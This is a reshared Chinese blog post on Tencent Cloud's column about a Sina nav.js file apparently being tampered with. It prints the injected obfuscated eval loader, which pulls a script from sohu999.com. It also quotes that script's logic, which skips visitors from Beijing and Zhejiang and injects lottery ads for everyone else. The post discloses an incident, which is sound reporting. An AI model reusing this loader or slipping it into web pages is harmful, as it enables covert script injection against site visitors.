前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >目测新浪的一个 js 被替换了,是内鬼还是被黑?

目测新浪的一个 js 被替换了,是内鬼还是被黑?

作者头像
砸漏
发布2020-10-16 11:33:37
5850
发布2020-10-16 11:33:37
举报
文章被收录于专栏:恩蓝脚本

http://tech.sina.com.cn/it/2018-04-19/doc-ifzihnep8570976.shtml 原文链接在这

http://n.sinaimg.cn/common/channelnav/js/nav.js 被替换的 js 在这

被增加的代码在这

eval(function(d,f,a,c,b,e){b=function(a){return a.toString(f)};if(!“”.replace(/^/,String)){for(;a–;)e[b(a)]=c[a]||b(a);c=[function(a){return e[a]}];b=function(){return“\\w+”};a=1}for(;a–;)c[a]&&(d=d.replace(new RegExp(“\\b”+b(a)+“\\b”,“g”),c[a]));return d}(‘2.8(“<0 3=\\”4\\” 5=\\”6/7\\” 1=\\”9\\” a=\\”b://c.d/e/f.g\\” </0 “);’,17,17,“script charset document id wf type text javascript writeln gb2312 src https sohu999 com imgs sina js“.split(” “),0,{}));

是被劫持的理由是广告跳转域名没有备案,也查不到是谁注册的,显示代理注册

sohu999…com 显示 DNS serverDNS pod emmm [:doge:]

https://sohu999.com/imgs/sina.js “` javascript loadScript(‘https://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js‘, function() { if (window.remote_ip_info.province == ‘北京’ || window.remote_ip_info.province == ‘浙江’) { return false } else { // 注入广告… } ) “`

JS 已经内容已经被修改为 11111111111111111111111111111111111111111111 了

关于怎么发现的,因为安装了 ABP,习惯了没有广告的世界突然发现有个广告,然后还是彩票的,然后想了解到底是什么广告,然后就发现有点不对。。。

貌似现在变成111了 这个可能是内鬼所为了!

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-04-20 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
ICP备案
在中华人民共和国境内从事互联网信息服务的网站或APP主办者,应当依法履行备案手续。腾讯云为您提供高效便捷的 ICP 备案服务。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档